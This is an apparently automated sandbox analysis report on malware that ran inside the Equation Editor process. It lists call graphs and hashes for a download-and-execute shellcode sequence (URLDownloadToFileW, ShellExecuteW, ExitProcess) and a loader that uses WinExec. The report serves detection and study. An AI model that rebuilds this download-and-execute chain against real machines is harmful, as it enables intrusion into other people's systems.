                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    • Opcode ID: 32e4d9aed68cf70c31092c01bb22c63d915843649bd81a82fd006a81bff80d2b
                                                                                                                                                                                    • Instruction ID: 11188ef08d9c50014cac67fcbaf888c3b49cd0d1dd5c82ce906fad37f6433ab8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32e4d9aed68cf70c31092c01bb22c63d915843649bd81a82fd006a81bff80d2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 324186A280D3C12FDB16A7306C69795FF60AF63108F6D89CE92C60A0E3E2988105D767
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03540451 Relevance: 6.1, APIs: 4, Instructions: 89libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 112 3540451-354045d LoadLibraryW call 354046b 115 35404cd-35404e6 call 35404ee 112->115 116 354045f-35404c4 call 35404c0 URLDownloadToFileW call 35404d9 112->116 121 354054d-3540559 115->121 122 35404e8-354050a ShellExecuteW call 3540513 115->122 131 35404c9-35404cb 116->131 124 354055c 121->124 122->124 140 354050c 122->140 127 3540564-3540568 124->127 128 354055e-3540562 124->128 133 354057d-354057f 127->133 134 354056a-354056e 127->134 128->127 132 3540570-3540577 128->132 131->115 137 3540579 132->137 138 354057b 132->138 139 354058f-3540590 133->139 134->132 134->133 137->133 138->133 141 3540581-354058a 138->141 140->133 142 354050e-3540518 ExitProcess 140->142 145 3540553-3540556 141->145 146 354058c 141->146 145->141 147 3540558 145->147 146->139 147->124
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
                                                                                                                                                                                      • Part of subcall function 0354046B: URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                      • Part of subcall function 0354046B: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 0354046B: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    • Opcode ID: 92e3794b7d42f9469de53645ee311701e80240d346712f5fa2776cd7bfe7e77b
                                                                                                                                                                                    • Instruction ID: e6afef1ea750a9658c01c04785fcd9daafc4adda5fdc996b25a76d2e5a5c2177
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92e3794b7d42f9469de53645ee311701e80240d346712f5fa2776cd7bfe7e77b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D52127A280D3C22FDB2797306C7AB95BF746F63108F6989CED1C20A4E3E6984501C767
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0354046B Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 149 354046b-35404e6 call 35404c0 URLDownloadToFileW call 35404d9 call 35404ee 161 354054d-3540559 149->161 162 35404e8-354050a ShellExecuteW call 3540513 149->162 163 354055c 161->163 162->163 175 354050c 162->175 165 3540564-3540568 163->165 166 354055e-3540562 163->166 169 354057d-354057f 165->169 170 354056a-354056e 165->170 166->165 168 3540570-3540577 166->168 172 3540579 168->172 173 354057b 168->173 174 354058f-3540590 169->174 170->168 170->169 172->169 173->169 176 3540581-354058a 173->176 175->169 177 354050e-3540518 ExitProcess 175->177 180 3540553-3540556 176->180 181 354058c 176->181 180->176 182 3540558 180->182 181->174 182->163
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3584569557-0
                                                                                                                                                                                    • Opcode ID: 524cf62bf31869ed51f225e3ceabab31bad88ac41599de6fb0f30232b40f5c78
                                                                                                                                                                                    • Instruction ID: 2be69b86b5dadb882f0a1d6555b55b37740366b5cf13e338a9c3c8bcc2db566b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 524cf62bf31869ed51f225e3ceabab31bad88ac41599de6fb0f30232b40f5c78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9321E3A280D3C22EDB2797705C7DB95BF706F63108FA989CE92C64A4E3E6984400C767
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 035404C0 Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 184 35404c0-35404c2 URLDownloadToFileW 185 35404c9-35404e6 call 35404ee 184->185 186 35404c4 call 35404d9 184->186 191 354054d-3540559 185->191 192 35404e8-354050a ShellExecuteW call 3540513 185->192 186->185 193 354055c 191->193 192->193 205 354050c 192->205 195 3540564-3540568 193->195 196 354055e-3540562 193->196 199 354057d-354057f 195->199 200 354056a-354056e 195->200 196->195 198 3540570-3540577 196->198 202 3540579 198->202 203 354057b 198->203 204 354058f-3540590 199->204 200->198 200->199 202->199 203->199 206 3540581-354058a 203->206 205->199 207 354050e-3540518 ExitProcess 205->207 210 3540553-3540556 206->210 211 354058c 206->211 210->206 212 3540558 210->212 211->204 212->193
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                      • Part of subcall function 035404D9: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 035404D9: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3584569557-0
                                                                                                                                                                                    • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                                                                                                                    • Instruction ID: a7d56b62c03e2129779edca20cbe0b74de4401f15271025e5040e2ae6868bafa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87F0E9B194C34439EB69E774BC69FE9EE64FF81708F750889B3464F0F2E58484009625
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 035404EE Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 214 35404ee-3540500 ShellExecuteW 216 3540507-354050a 214->216 217 3540502 call 3540513 214->217 219 354055c 216->219 220 354050c 216->220 217->216 221 3540564-3540568 219->221 222 354055e-3540562 219->222 223 354057d-354057f 220->223 224 354050e-3540518 ExitProcess 220->224 221->223 226 354056a-354056e 221->226 222->221 225 3540570-3540577 222->225 227 354058f-3540590 223->227 229 3540579 225->229 230 354057b 225->230 226->223 226->225 229->223 230->223 231 3540581-354058a 230->231 234 3540553-3540556 231->234 235 354058c 231->235 234->231 236 3540558 234->236 235->227 236->219
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 03540513: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteExitProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1124553745-0
                                                                                                                                                                                    • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                                                                                                                    • Instruction ID: 2e03075945951acbe2632ae42dc50963ce5f6b9aba8adc739c63237ba70f5082
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                                                                                                                    • Instruction Fuzzy Hash: 820126F9D5434221DB3CE668E8957F5FA60FB81708FFC8847AB814B0F5E05481C3A62A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 035404D9 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 237 35404d9-35404db 239 35404e0-35404e6 237->239 240 35404db call 35404ee 237->240 241 354054d-3540559 239->241 242 35404e8-354050a ShellExecuteW call 3540513 239->242 240->239 243 354055c 241->243 242->243 255 354050c 242->255 245 3540564-3540568 243->245 246 354055e-3540562 243->246 249 354057d-354057f 245->249 250 354056a-354056e 245->250 246->245 248 3540570-3540577 246->248 252 3540579 248->252 253 354057b 248->253 254 354058f-3540590 249->254 250->248 250->249 252->249 253->249 256 3540581-354058a 253->256 255->249 257 354050e-3540518 ExitProcess 255->257 260 3540553-3540556 256->260 261 354058c 256->261 260->256 262 3540558 260->262 261->254 262->243
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteExitProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1124553745-0
                                                                                                                                                                                    • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                                                                                                                    • Instruction ID: 896af9b2da48ba3f562eef6d32fe6fe3f1d7a0409aebef90016169c330774938
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 610126F5D4830531E778E228ECC8BF9F9A1FB8170CFB8845BA7910B0F5D2448542A62E
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03540513 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 264 3540513-3540518 ExitProcess
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                                                                                                                    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0354051A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 266 354051a-3540525 GetPEB 267 3540528-3540539 call 3540542 266->267 270 354053b-354053f 267->270
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                                                    • Instruction ID: b9b3d90e6400924430747b4874ea9b62a8c299a9f61612832ec95f7d05809be1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D05E712025028FC348DB04E940EA6F37AFFC4211B64C268D5054B669C330EC91CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 035403AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 271 35403aa-35403c5 ExitProcess call 35403c3
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNEL32(03540398), ref: 035403AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    • Opcode ID: 163300cb0f5e1ff4de632dbd47d6d67cd98515e77528f93afd9f0c430eff25bd
                                                                                                                                                                                    • Instruction ID: 286bdea990d34a737443ba2b07b9ef4b29e8ed3727e8d9299668cd1e61a83b82
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163300cb0f5e1ff4de632dbd47d6d67cd98515e77528f93afd9f0c430eff25bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2C08C6A80AB421A8608E2B03AA70CCFA30FA42214360548242408F2B3F0A4A3E851D2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:6.8%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                                    Total number of Nodes:1170
                                                                                                                                                                                    Total number of Limit Nodes:17
                                                                                                                                                                                    execution_graph 55930 325a2f4 55940 3236530 55930->55940 55934 325a322 55945 3259b3c timeSetEvent 55934->55945 55936 325a32c 55937 325a33a GetMessageA 55936->55937 55938 325a32e TranslateMessage DispatchMessageA 55937->55938 55939 325a34a 55937->55939 55938->55937 55941 323653b 55940->55941 55946 323415c 55941->55946 55944 3234270 SysAllocStringLen SysFreeString SysReAllocStringLen 55944->55934 55945->55936 55947 32341a2 55946->55947 55948 323421b 55947->55948 55949 32343ac 55947->55949 55960 32340f4 55948->55960 55951 32343dd 55949->55951 55954 32343ee 55949->55954 55965 3234320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 55951->55965 55956 3234433 FreeLibrary 55954->55956 55957 3234457 55954->55957 55955 32343e7 55955->55954 55956->55954 55958 3234460 55957->55958 55959 3234466 ExitProcess 55957->55959 55958->55959 55961 3234137 55960->55961 55962 3234104 55960->55962 55961->55944 55962->55961 55966 32315cc 55962->55966 55970 323582c 55962->55970 55965->55955 55974 3231560 55966->55974 55968 32315d4 VirtualAlloc 55969 32315eb 55968->55969 55969->55962 55971 323583c GetModuleFileNameA 55970->55971 55973 3235858 55970->55973 55976 3235a90 GetModuleFileNameA RegOpenKeyExA 55971->55976 55973->55962 55975 3231500 55974->55975 55975->55968 55977 3235b13 55976->55977 55978 3235ad3 RegOpenKeyExA 55976->55978 55994 32358cc 12 API calls 55977->55994 55978->55977 55980 3235af1 RegOpenKeyExA 55978->55980 55980->55977 55982 3235b9c lstrcpynA GetThreadLocale GetLocaleInfoA 55980->55982 55981 3235b38 RegQueryValueExA 55983 3235b76 RegCloseKey 55981->55983 55984 3235b58 RegQueryValueExA 55981->55984 55985 3235bd3 55982->55985 55986 3235cb6 55982->55986 55983->55973 55984->55983 55985->55986 55988 3235be3 lstrlenA 55985->55988 55986->55973 55989 3235bfb 55988->55989 55989->55986 55990 3235c20 lstrcpynA LoadLibraryExA 55989->55990 55991 3235c48 55989->55991 55990->55991 55991->55986 55992 3235c52 lstrcpynA LoadLibraryExA 55991->55992 55992->55986 55993 3235c84 lstrcpynA LoadLibraryExA 55992->55993 55993->55986 55994->55981 55995 3234ea0 55996 3234ead 55995->55996 56000 3234eb4 55995->56000 56004 3234bf4 SysAllocStringLen 55996->56004 56001 3234c14 56000->56001 56002 3234c20 56001->56002 56003 3234c1a SysFreeString 56001->56003 56003->56002 56004->56000 56005 3259b30 56008 324d5d0 56005->56008 56009 324d5d8 56008->56009 56009->56009 58515 3232ee0 QueryPerformanceCounter 56009->58515 56011 324d5f9 56012 324d603 InetIsOffline 56011->56012 56013 324d60d 56012->56013 56014 324d61e 56012->56014 58527 32344f4 56013->58527 56016 32344f4 11 API calls 56014->56016 56018 324d62d 56016->56018 58518 3234824 56018->58518 58516 3232ef8 GetTickCount 58515->58516 58517 3232eed 58515->58517 58516->56011 58517->56011 58519 3234835 58518->58519 58520 3234872 58519->58520 58521 323485b 58519->58521 58542 3234564 58520->58542 58533 3234b90 58521->58533 58524 32348a3 58525 3234868 58525->58524 58526 32344f4 11 API calls 58525->58526 58526->58524 58528 32344f8 58527->58528 58531 3234508 58527->58531 58530 3234564 11 API calls 58528->58530 58528->58531 58529 3234536 58529->56018 58530->58531 58531->58529 58554 3232c2c 11 API calls 58531->58554 58534 3234b9d 58533->58534 58539 3234bcd 58533->58539 58536 3234bc6 58534->58536 58537 3234ba9 58534->58537 58538 3234564 11 API calls 58536->58538 58547 3232c44 11 API calls 58537->58547 58538->58539 58548 32344a0 58539->58548 58540 3234bb7 58540->58525 58543 3234568 58542->58543 58544 323458c 58542->58544 58553 3232c10 11 API calls 58543->58553 58544->58525 58546 3234575 58546->58525 58547->58540 58549 32344a6 58548->58549 58551 32344c1 58548->58551 58549->58551 58552 3232c2c 11 API calls 58549->58552 58551->58540 58552->58551 58553->58546 58554->58529 58555 3251ac0 58556 3234824 11 API calls 58555->58556 58557 3251ae1 58556->58557 58558 3251aec 58557->58558 58559 3251af9 58558->58559 59993 32347b0 58559->59993 58561 3251b18 60008 3234964 58561->60008 59994 3234815 59993->59994 59995 32347b4 59993->59995 59996 32344f4 59995->59996 59997 32347bc 59995->59997 60002 3234564 11 API calls 59996->60002 60003 3234508 59996->60003 59997->59994 59999 32347cb 59997->59999 60000 32344f4 11 API calls 59997->60000 59998 3234536 59998->58561 60001 3234564 11 API calls 59999->60001 60000->59999 60005 32347e5 60001->60005 60002->60003 60003->59998 60012 3232c2c 11 API calls 60003->60012 60006 32344f4 11 API calls 60005->60006 60007 3234811 60006->60007 60007->58561 60009 3234968 60008->60009 60010 3234698 60009->60010 60011 323469e 60010->60011 60012->59998 60013 15ceae66 60018 15cda7b7 60013->60018 60019 15cda7ca 60018->60019 60020 15cda7d4 60018->60020 60026 15ceac49 60019->60026 60020->60019 60057 15ce8215 35 API calls 3 library calls 60020->60057 60022 15cda7f5 60058 15ce8364 35 API calls __fassign 60022->60058 60024 15cda80e 60059 15ce8391 35 API calls __fassign 60024->60059 60027 15ceac64 60026->60027 60028 15ceac8a MultiByteToWideChar 60027->60028 60029 15ceacb4 60028->60029 60030 15ceae3e 60028->60030 60032 15ceacf2 60029->60032 60037 15ceacd5 60029->60037 60072 15cd4fcb 5 API calls ___raise_securityfailure 60030->60072 60068 15ce6137 21 API calls 3 library calls 60032->60068 60033 15ceae51 60035 15cead1e MultiByteToWideChar 60036 15cead8a 60035->60036 60039 15cead37 60035->60039 60071 15cd5e40 20 API calls _free 60036->60071 60037->60035 60037->60036 60038 15ceacfe 60038->60036 60038->60037 60060 15ce8bb3 60039->60060 60043 15cead99 60045 15ceadd3 60043->60045 60046 15ceadba 60043->60046 60044 15cead61 60044->60036 60049 15ce8bb3 11 API calls 60044->60049 60069 15ce6137 21 API calls 3 library calls 60045->60069 60048 15ceae2f 60046->60048 60050 15ce8bb3 11 API calls 60046->60050 60070 15cd5e40 20 API calls _free 60048->60070 60049->60036 60053 15ceae0e 60050->60053 60052 15ceaddf 60052->60046 60052->60048 60053->60048 60054 15ceae1d WideCharToMultiByte 60053->60054 60054->60048 60055 15ceae5d 60054->60055 60073 15cd5e40 20 API calls _free 60055->60073 60057->60022 60058->60024 60059->60019 60074 15ce84ca 60060->60074 60064 15ce8c23 LCMapStringW 60065 15ce8be3 60064->60065 60082 15cd4fcb 5 API calls ___raise_securityfailure 60065->60082 60067 15ce8c35 60067->60036 60067->60043 60067->60044 60068->60038 60069->60052 60070->60036 60071->60030 60072->60033 60073->60036 60075 15ce84fa 60074->60075 60079 15ce84f6 60074->60079 60075->60065 60081 15ce8c3b 10 API calls 2 library calls 60075->60081 60076 15ce851a 60076->60075 60078 15ce8526 GetProcAddress 60076->60078 60080 15ce8536 __crt_fast_encode_pointer 60078->60080 60079->60075 60079->60076 60083 15ce8566 60079->60083 60080->60075 60081->60064 60082->60067 60084 15ce8587 LoadLibraryExW 60083->60084 60088 15ce857c 60083->60088 60085 15ce85bc 60084->60085 60086 15ce85a4 GetLastError 60084->60086 60085->60088 60089 15ce85d3 FreeLibrary 60085->60089 60086->60085 60087 15ce85af LoadLibraryExW 60086->60087 60087->60085 60088->60079 60089->60088 60090 3254efe 60091 3234824 11 API calls 60090->60091 60092 3254f1f 60091->60092 60093 32347b0 11 API calls 60092->60093 60094 3254f56 60093->60094 60818 3247be8 60094->60818 60097 3234824 11 API calls 60098 3254f9b 60097->60098 60099 32347b0 11 API calls 60098->60099 60100 3254fd2 60099->60100 60101 3247be8 17 API calls 60100->60101 60102 3254ff6 60101->60102 60103 3234824 11 API calls 60102->60103 60104 3255017 60103->60104 60105 32347b0 11 API calls 60104->60105 60106 325504e 60105->60106 60107 3247be8 17 API calls 60106->60107 60108 3255072 60107->60108 60109 3234824 11 API calls 60108->60109 60110 3255093 60109->60110 60111 32347b0 11 API calls 60110->60111 60112 32550ca 60111->60112 60113 3247be8 17 API calls 60112->60113 60114 32550ee 60113->60114 60115 3234824 11 API calls 60114->60115 60116 325510f 60115->60116 60117 32347b0 11 API calls 60116->60117 60118 3255146 60117->60118 60119 3247be8 17 API calls 60118->60119 60120 325516a 60119->60120 60121 3234824 11 API calls 60120->60121 60122 32551a4 60121->60122 60827 324d318 60122->60827 60125 3234824 11 API calls 60126 3255211 60125->60126 60127 32347b0 11 API calls 60126->60127 60128 3255248 60127->60128 60129 3247be8 17 API calls 60128->60129 60130 325526c 60129->60130 60131 3234824 11 API calls 60130->60131 60132 325528d 60131->60132 60133 32347b0 11 API calls 60132->60133 60134 32552c4 60133->60134 60135 3247be8 17 API calls 60134->60135 60136 32552e8 60135->60136 60137 3234824 11 API calls 60136->60137 60138 3255309 60137->60138 60139 32347b0 11 API calls 60138->60139 60140 3255340 60139->60140 60141 3247be8 17 API calls 60140->60141 60142 3255364 60141->60142 60143 3234824 11 API calls 60142->60143 60144 3255385 60143->60144 60145 32347b0 11 API calls 60144->60145 60146 32553bc 60145->60146 60147 3247be8 17 API calls 60146->60147 60148 32553e0 60147->60148 60149 3234824 11 API calls 60148->60149 60150 3255401 60149->60150 60151 32347b0 11 API calls 60150->60151 60152 3255438 60151->60152 60153 3247be8 17 API calls 60152->60153 60154 325545c 60153->60154 60155 3234824 11 API calls 60154->60155 60156 325547d 60155->60156 60157 32347b0 11 API calls 60156->60157 60158 32554b4 60157->60158 60159 3247be8 17 API calls 60158->60159 60160 32554d8 60159->60160 60161 3234824 11 API calls 60160->60161 60162 32554f9 60161->60162 60163 32347b0 11 API calls 60162->60163 60164 3255530 60163->60164 60165 3247be8 17 API calls 60164->60165 60166 3255554 60165->60166 60167 3234824 11 API calls 60166->60167 60168 3255575 60167->60168 60169 32347b0 11 API calls 60168->60169 60170 32555ac 60169->60170 60171 3247be8 17 API calls 60170->60171 60172 32555d0 60171->60172 60173 3234824 11 API calls 60172->60173 60174 32555f1 60173->60174 60175 32347b0 11 API calls 60174->60175 60176 3255628 60175->60176 60177 3247be8 17 API calls 60176->60177 60178 325564c 60177->60178 60179 3255661 60178->60179 60180 3256190 60178->60180 60181 3234824 11 API calls 60179->60181 60182 3234824 11 API calls 60180->60182 60184 3255682 60181->60184 60183 32561b1 60182->60183 60185 32347b0 11 API calls 60183->60185 60186 32347b0 11 API calls 60184->60186 60188 32561e8 60185->60188 60187 32556b9 60186->60187 60189 3247be8 17 API calls 60187->60189 60190 3247be8 17 API calls 60188->60190 60191 32556dd 60189->60191 60192 325620c 60190->60192 60193 3234824 11 API calls 60191->60193 60194 3234824 11 API calls 60192->60194 60196 32556fe 60193->60196 60195 325622d 60194->60195 60197 32347b0 11 API calls 60195->60197 60198 32347b0 11 API calls 60196->60198 60200 3256264 60197->60200 60199 3255735 60198->60199 60201 3247be8 17 API calls 60199->60201 60202 3247be8 17 API calls 60200->60202 60203 3255759 60201->60203 60204 3256288 60202->60204 60205 3234824 11 API calls 60203->60205 60206 3234824 11 API calls 60204->60206 60207 325577a 60205->60207 60208 32562a9 60206->60208 60210 32347b0 11 API calls 60207->60210 60209 32347b0 11 API calls 60208->60209 60211 32562e0 60209->60211 60212 32557b1 60210->60212 60214 3247be8 17 API calls 60211->60214 60213 3247be8 17 API calls 60212->60213 60215 32557d5 60213->60215 60216 3256304 60214->60216 60217 32347b0 11 API calls 60215->60217 60218 3234824 11 API calls 60216->60218 60219 32557ed 60217->60219 60222 3256325 60218->60222 60220 32557f8 WinExec 60219->60220 60221 3234824 11 API calls 60220->60221 60224 325581f 60221->60224 60223 32347b0 11 API calls 60222->60223 60225 325635c 60223->60225 60226 32347b0 11 API calls 60224->60226 60227 3247be8 17 API calls 60225->60227 60228 3255856 60226->60228 60230 3256380 60227->60230 60229 3247be8 17 API calls 60228->60229 60232 325587a 60229->60232 60231 3256b54 60230->60231 60234 3234824 11 API 